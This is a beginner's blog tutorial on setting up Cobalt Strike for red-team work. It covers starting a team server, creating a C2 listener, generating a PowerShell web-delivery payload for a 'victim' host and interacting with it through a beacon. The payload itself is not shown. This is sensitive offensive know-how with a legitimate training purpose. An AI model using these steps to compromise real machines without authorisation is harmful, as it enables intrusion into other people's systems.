Getting started with Cobalt Strike

As an aspiring Red Teamer, I’ve recently started playing with Cobalt Strike, so I thought it would be a good idea to start a series of blog posts on using it and its many features. As some of you may be aware, Cobalt Strike is software for Adversary Simulations and Red Team Operations.

More information can be found here: https://www.cobaltstrike.com

In this first post, I will quickly go through how to get Cobalt Strike up and running on your system, creating a listener and interacting with a victim’s machine. This will be short and to the point. 🙂

If you haven’t used Cobalt Strike before, Im going to presume that you havent go a full licenced copy. A trial copy can be requested at the following URL:

https://trial.cobaltstrike.com/

Installation and setup can be found here:

https://www.cobaltstrike.com/support

Once you have your trial copy downloaded and pre-requisites installed you can begin.

Starting the team server

Starting the team server

From within the Cobalt Strike directory, type the following command to start the team server. 192.168.0.12 is the IP address of my Kali Linux system. Note: The password can be anything you desire.

./teamserver <IP Address> <password>

Starting Cobalt Strike

Starting Cobalt Strike

Type the following command to start the Cobalt Strike user interface

./cobaltstrike

Connecting to the team server

Connecting to the team server

Once you have started Cobalt Strike, you are required to connect to your team server. Fill in the details including the password you set when starting the team server. The User field can be anything you want. Use your super cool hacker handle here. ;P

Cobalt Strike’s user interface

Cobalt Strike's user interface

Once connected, you will be presented with the Cobalt Strike user interface where you will interact with your agents and do all sorts of other cool stuff.

Creating a listener

Creating a listener

You will be required to create a listener for your compromised machines to connect to. Simply click Cobalt Strike – Listeners.

Creating a listener

Once the Listeners tab has loaded, click Add.

Creating a listener

Give the listener a name, in this case, I called it “C2”. Select your desired payload, ensure the IP address is correct (team server IP) and choose a port to listen on.

Create a listener

Here you can input a domain name that points to your team server. We will use an IP address in this case.

Creating a listener

The listener has been created and can be viewed, deleted etc from the Listeners tab.

Delivering the payload

Delivering the payload

We are now going to quickly compromise a host and have it connect to our team server in order to interact with it.

Select Attacks – Web Drive-by – Scripted Web Delivery

This will provide us with a PowerShell one-liner to run on the victim host.

Delivering the payload

Here we select the options to configure our quick web server to host and deliver the PowerShell one-liner.

Delivering the payload

Copy the URL provided.

Delivering the payload

Switch over to the victim’s machine and paste in the PowerShell one-liner. Just to be clear, this is for demonstration purposes. In reality, the payload would be delivered to the victim via some sort of social engineering attack.

Interacting with the victim host

Interacting with the host

Once the PowerShell one-liner is executed, the victim will connect to the team server and be available for interaction.

Interacting with the host

To interact with the host, right click on the compromised host and click Interact.

Interacting with the host

For demonstration, I typed the following command:

beacon> shell ipconfig /all

Hopefully this gave you some insight on how easy it is to get started with Cobalt Strike. There will be many more blog posts surrounding this excellent product.

If you’re itching to learn more, I’d recommend reading through the Cobalt Strike manual: https://www.cobaltstrike.com/downloads/csmanual39.pdf